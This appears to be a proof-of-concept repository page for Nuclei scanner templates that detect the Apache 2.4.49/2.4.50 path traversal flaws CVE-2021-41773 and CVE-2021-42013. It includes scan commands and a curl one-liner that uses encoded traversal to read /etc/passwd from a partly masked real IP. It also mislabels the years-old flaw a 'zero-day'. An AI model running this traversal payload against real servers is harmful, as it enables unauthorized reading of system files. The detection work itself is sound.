CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源

关联漏洞

Description

    Detects Apache HTTP Server path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013)     by checking for exposure of /etc/passwd through various traversal techniques.

介绍

# Scan FOR APACHE versions "ZERO-DAY" 

```Apache Version 2.4.49 and 2.4.50 ``` 


```(CVE-2021-41773) and (CVE-2021-42013)```


## How to use : 

You Will need nuclei ! 

https://github.com/projectdiscovery/nuclei


Check local nuclei install and verify template 

```nuclei  -t apache-vulnerable-versions.yaml -vv ```

and 

```nuclei -t apache-path-traversal-rce-v2.yaml -vv ```

You should see 

```[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high] ```

and 

```[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]```

To scan target : 

```  nuclei --silent  -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port ``` 

To scan targets in a file : 

```  nuclei --silent  -t apache-vulnerable-versions.yaml -l hosts.txt``` 


## Info about Nuclei templates 

```apache-vulnerable-versions.yaml``` - Detects version of Apache and will output HIGH if vulnerible. 

![apache-vulnerable-versions.yaml](https://imgur.com/WTDHjtO.png)


```apache-path-traversal-rce-v2.yaml``` - Will run a exploit and show the path vulnerible. Will output CRITICAL if  vulnerible.

![apache-path-traversal-rce-v2.yaml](https://imgur.com/Nrg7vER.png)

POC : 

```curl -s  -k  https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd ```

![POC](https://imgur.com/ijInybr.png)

文件快照

 [4.0K]  /data/pocs/0bead600a605d31a20364b2b322db10713d769d7
├── [2.3K]  apache-path-traversal-rce-v2.yaml
├── [ 795]  apache-vulnerable-versions.yaml
└── [1.3K]  README.md

0 directories, 3 files

备注